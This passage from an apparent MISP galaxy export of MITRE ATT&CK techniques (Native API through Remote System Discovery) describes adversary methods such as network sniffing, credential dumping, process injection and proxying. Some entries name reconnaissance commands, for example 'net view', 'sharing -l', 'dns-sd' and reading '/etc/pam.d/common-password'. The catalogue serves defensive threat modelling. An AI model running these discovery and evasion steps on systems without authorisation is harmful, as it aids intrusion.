Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.[Microsoft NET][Apple Core Services][MACOS Cocoa][macOS Foundation]

Adversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.[Redops Syscalls] Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via Disable or Modify Tools.

Internal MISP references

UUID 1120f5ec-ef1b-4596-8d8b-a3979a766560 which can be used as unique global reference for Native API in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Network Boundary Bridging

Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.

Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.

When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via Multi-hop Proxy or exfiltration of data via Traffic Duplication. Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with Internal Proxy to achieve the same goals.[Kaspersky ThreatNeedle Feb 2021] In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.

Internal MISP references

UUID 091282d8-ef05-487f-93aa-445efaeed71b which can be used as unique global reference for Network Boundary Bridging in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Network']
source MITRE
Related clusters

To see the related clusters, click here.

Network Denial of Service

Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes[FireEye OpPoisonedHandover February 2016] and to support other malicious activities, including distraction[FSISAC FraudNetDoS September 2012], hacktivism, and extortion.[Symantec DDoS October 2014]

A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

To perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.

Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.

For DoS attacks targeting the hosting system directly, see Endpoint Denial of Service.

Internal MISP references

UUID e6c14a7b-1fb8-4557-83e7-7f5b89717311 which can be used as unique global reference for Network Denial of Service in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Containers', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Network Service Discovery

Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.[CISA AR21-126A FIVEHANDS May 2021]

Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.

Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp .) to find other systems broadcasting the ssh service.[apple doco bonjour description][macOS APT Activity Bradley]

Internal MISP references

UUID 5bab1234-8d1e-437f-88a0-d527b2dfc6cd which can be used as unique global reference for Network Service Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'IaaS', 'Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Network Share Discovery

Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.

File sharing over a Windows network occurs over the SMB protocol. [Wikipedia Shared Resource] [TechNet Shared Folder] Net can be used to query a remote system for available shared drives using the net view \\remotesystem command. It can also be used to query shared drives on the local system using net share. For macOS, the sharing -l command lists all shared points used for smb services.

Internal MISP references

UUID ac5e465f-466d-41e4-933a-04e2c861e820 which can be used as unique global reference for Network Share Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Network Sniffing

Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as LLMNR/NBT-NS Poisoning and SMB Relay, can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.

Network sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. Adversaries may likely also utilize network sniffing during Adversary-in-the-Middle (AiTM) to passively gain additional knowledge about the environment.

In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.[AWS Traffic Mirroring][GCP Packet Mirroring][Azure Virtual Network TAP] Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.[Rhino Security Labs AWS VPC Traffic Mirroring][SpecterOps AWS Traffic Mirroring] The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.[Rhino Security Labs AWS VPC Traffic Mirroring]

On network devices, adversaries may perform network captures using Network Device CLI commands such as monitor capture.[US-CERT-TA18-106A][capture_embedded_packet_on_software]

Internal MISP references

UUID bbad213d-477d-43bf-9501-ad7d74bac323 which can be used as unique global reference for Network Sniffing in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Non-Application Layer Protocol

Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.[Wikipedia OSI] Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).

ICMP communication between hosts is one example.[Cisco Synful Knock Evolution] Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.[Microsoft ICMP] However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.

Internal MISP references

UUID 4aed5968-6380-47d2-bbd7-3a4d959089e1 which can be used as unique global reference for Non-Application Layer Protocol in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Non-Standard Port

Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088[Symantec Elfin Mar 2019] or port 587[Fortinet Agent Tesla April 2018] as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.

Adversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.[change_rdp_port_conti]

Internal MISP references

UUID 36850d17-a7d5-41ac-aa89-040b9c0b2b3f which can be used as unique global reference for Non-Standard Port in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Obfuscated Files or Information

Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. [Volexity PowerDuke November 2016] Adversaries may also use compressed or archived scripts, such as JavaScript.

Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. [Linux/Cdorked.A We Live Security Analysis] Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. [Carbon Black Obfuscation Sept 2016]

Adversaries may also abuse Command Obfuscation to obscure commands executed from payloads or directly via Command and Scripting Interpreter. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. [FireEye Obfuscation June 2017] [FireEye Revoke-Obfuscation July 2017][PaloAlto EncodedCommand March 2017]

Internal MISP references

UUID 046cc07e-8700-4536-9c5b-6ecb384f52b0 which can be used as unique global reference for Obfuscated Files or Information in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Obtain Capabilities

Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.

In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.[NationsBuying][PegasusCitizenLab]

In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.[DiginotarCompromise]

Internal MISP references

UUID a6740db8-10d6-4e5b-986b-7695d3fc4b85 which can be used as unique global reference for Obtain Capabilities in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Office Application Startup

Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.

A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.[SensePost Ruler GitHub] These persistence mechanisms can work within Outlook or be used through Office 365.[TechNet O365 Outlook Rules]

Internal MISP references

UUID db846575-a79b-4403-870d-5842be82001d which can be used as unique global reference for Office Application Startup in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Office 365', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

OS Credential Dumping

Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.[Brining MimiKatz to Unix] Credentials can then be used to perform Lateral Movement and access restricted information.

Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.

Internal MISP references

UUID 368f85f9-2b15-4732-80fe-087694eaf34d which can be used as unique global reference for OS Credential Dumping in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Password Policy Discovery

Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through Brute Force. This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).

Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies [Superuser Linux Password Policies] [Jamf User Password Policies]. Adversaries may also leverage a Network Device CLI on network devices to discover password policy information (e.g. show aaa, show aaa common-criteria policy all).[US-CERT-TA18-106A]

Password policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS [AWS GetPasswordPolicy].

Internal MISP references

UUID 2bf2e498-99c8-4e36-ad4b-e675d95ac925 which can be used as unique global reference for Password Policy Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Peripheral Device Discovery

Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.[Peripheral Discovery Linux][Peripheral Discovery macOS] Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.

Internal MISP references

UUID 0997d871-875e-41e4-891c-f8a4ed8b2f31 which can be used as unique global reference for Peripheral Device Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Permission Groups Discovery

Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.

Adversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.[CrowdStrike BloodHound April 2018]

Internal MISP references

UUID f9d61206-3063-4d04-b06f-225f4766bff1 which can be used as unique global reference for Permission Groups Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Containers', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Phishing

Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.

Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., Email Hiding Rules).[Microsoft OAuth Spam 2022][Palo Alto Unit 42 VBA Infostealer 2014] Another way to accomplish this is by forging or spoofing[Proofpoint-spoof] the identity of the sender which can be used to fool both the human recipient as well as automated security tools.[cyberproof-double-bounce]

Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,[sygnia Luna Month][CISA Remote Monitoring and Management Software] or install adversary-accessible remote management tools onto their computer (i.e., User Execution).[Unit42 Luna Moth]

Internal MISP references

UUID d4a36624-50cb-43d3-95af-a2e10878a533 which can be used as unique global reference for Phishing in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Phishing for Information

Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from Phishing in that the objective is gathering data from the victim rather than executing malicious code.

All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.

Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.[ThreatPost Social Media Phishing][TrendMictro Phishing][PCMag FakeLogin][Sophos Attachment][GitHub Phishery] Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.[Avertium callback phishing]

Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: Establish Accounts or Compromise Accounts) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing[Proofpoint-spoof] the identity of the sender which can be used to fool both the human recipient as well as automated security tools.[cyberproof-double-bounce]

Phishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., Email Hiding Rules).[Microsoft OAuth Spam 2022][Palo Alto Unit 42 VBA Infostealer 2014]

Internal MISP references

UUID b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06 which can be used as unique global reference for Phishing for Information in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Plist File Modification

Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the info.plist file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.[fileinfo plist file description]

Adversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. Hidden Window) or running additional commands for persistence (ex: Launch Agent/Launch Daemon or Re-opened Applications).

For example, adversaries can add a malicious application path to the ~/Library/Preferences/com.apple.dock.plist file, which controls apps that appear in the Dock. Adversaries can also modify the LSUIElement key in an application’s info.plist file to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as LSEnvironment, to enable persistence via Dynamic Linker Hijacking.[wardle chp2 persistence][eset_osx_flashback]

Internal MISP references

UUID ee177ad0-d282-42c0-91f9-7bcf724e3d31 which can be used as unique global reference for Plist File Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
source MITRE
Related clusters

To see the related clusters, click here.

Power Settings

Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.[Sleep, shut down, hibernate]

Adversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity.[Microsoft: Powercfg command-line options][systemdsleep Linux]

For example, powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.[Two New Monero Malware Attacks Target Windows and Android Users] Adversaries may also extend system lock screen timeout settings.[BATLOADER: The Evasive Downloader Malware] Other relevant settings, such as disk and hibernate timeout, can be similarly abused to keep the infected machine running even if no user is active.[CoinLoader: A Sophisticated Malware Loader Campaign]

Aware that some malware cannot survive system reboots, adversaries may entirely delete files used to invoke system shut down or reboot.[Condi-Botnet-binaries]

Internal MISP references

UUID 0719ea2b-d630-5ada-9b04-c3136ff530ae which can be used as unique global reference for Power Settings in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Pre-OS Boot

Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.[Wikipedia Booting]

Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.

Internal MISP references

UUID 33cd26b0-0248-4ee2-97a6-aab6a79824af which can be used as unique global reference for Pre-OS Boot in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Process Discovery

Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

In Windows environments, adversaries could obtain details on running processes using the Tasklist utility via cmd or Get-Process via PowerShell. Information about processes can also be extracted from the output of Native API calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.

On network devices, Network Device CLI commands such as show processes can be used to display current running processes.[US-CERT-TA18-106A][show_processes_cisco_cmd]

Internal MISP references

UUID 710ae610-0556-44e5-9de9-8be6159a23dd which can be used as unique global reference for Process Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Process Injection

Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific.

More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.

Internal MISP references

UUID 7a6208ac-c75e-4e73-8969-0aaf6085cb6e which can be used as unique global reference for Process Injection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Protocol Tunneling

Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet.

There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.[SSH Tunneling]

Protocol Tunneling may also be abused by adversaries during Dynamic Resolution. Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.[BleepingComp Godlua JUL19]

Adversaries may also leverage Protocol Tunneling in conjunction with Proxy and/or Protocol Impersonation to further conceal C2 communications and infrastructure.

Internal MISP references

UUID bd677092-d197-4230-b94a-438cb24260fd which can be used as unique global reference for Protocol Tunneling in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Proxy

Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. [Trend Micro APT Attack Tools] Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.

Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.

Internal MISP references

UUID ba6a869a-c870-4be6-bc08-e078f0efdc3b which can be used as unique global reference for Proxy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Query Registry

Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.

The Registry contains a significant amount of information about the operating system, configuration, software, and security.[Wikipedia Windows Registry] Information can easily be queried using the Reg utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from Query Registry during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Internal MISP references

UUID 58722f84-b119-45a8-8e29-0065688015ee which can be used as unique global reference for Query Registry in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Reflective Code Loading

Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., Shared Modules).

Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).[Introducing Donut][S1 Custom Shellcode Tool][Stuart ELF Memory][00sec Droppers][Mandiant BYOL] For example, the Assembly.Load() method executed by PowerShell may be abused to load raw code into the running process.[Microsoft AssemblyLoad]

Reflective code injection is very similar to Process Injection except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.[Stuart ELF Memory][00sec Droppers][Intezer ACBackdoor][S1 Old Rat New Tricks]

Internal MISP references

UUID ef85800b-080d-4739-9f3b-91b61314a93e which can be used as unique global reference for Reflective Code Loading in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Remote Access Software

An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as VNC, Team Viewer, AnyDesk, ScreenConnect, LogMein, AmmyyAdmin, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.[Symantec Living off the Land][CrowdStrike 2015 Global Threat Report][CrySyS Blog TeamSpy]

Remote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary-controlled system.

Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.

Installation of many remote access software may also include persistence (e.g., the software's installation routine creates a Windows Service). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome’s Remote Desktop).[Google Chrome Remote Desktop][Chrome Remote Desktop]

Internal MISP references

UUID acf828f4-7e7e-43e1-bf15-ceab42021430 which can be used as unique global reference for Remote Access Software in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Remote Services

Adversaries may use Valid Accounts to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.

In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).[SSH Secure Shell][TechNet Remote Desktop Services] They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain.

Legitimate applications (such as Software Deployment Tools and other administrative programs) may utilize Remote Services to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including VNC to send the screen and control buffers and SSH for secure file transfer.[Remote Management MDM macOS][Kickstart Apple Remote Desktop commands][Apple Remote Desktop Admin Guide 3.3] Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.[FireEye 2019 Apple Remote Desktop][Lockboxx ARD 2019][Kickstart Apple Remote Desktop commands]

Internal MISP references

UUID 30ef3f13-5e9b-4712-9adf-f0da4ef157a1 which can be used as unique global reference for Remote Services in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Remote Service Session Hijacking

Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.

Adversaries may commandeer these sessions to carry out actions on remote systems. Remote Service Session Hijacking differs from use of Remote Services because it hijacks an existing session rather than creating a new session using Valid Accounts.[RDP Hijacking Medium][Breach Post-mortem SSH Hijack]

Internal MISP references

UUID c992f340-645d-412a-b509-3cbaf94919b0 which can be used as unique global reference for Remote Service Session Hijacking in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Remote System Discovery

Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or net view using Net.

Adversaries may also analyze data from local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) or other passive means (such as local Arp cache entries) in order to discover the presence of remote systems in an environment.

Adversaries may also target discovery of network infrastructure as well as leverage Network Device CLI commands on network devices to gather detailed information about systems within a network (e.g. show cdp neighbors, show arp).[US-CERT-TA18-106A][CISA AR21-126A FIVEHANDS May 2021]

Internal MISP references

UUID 00a9a4d4-928d-4d95-be31-dfac6103991f which can be used as unique global reference for Remote System Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
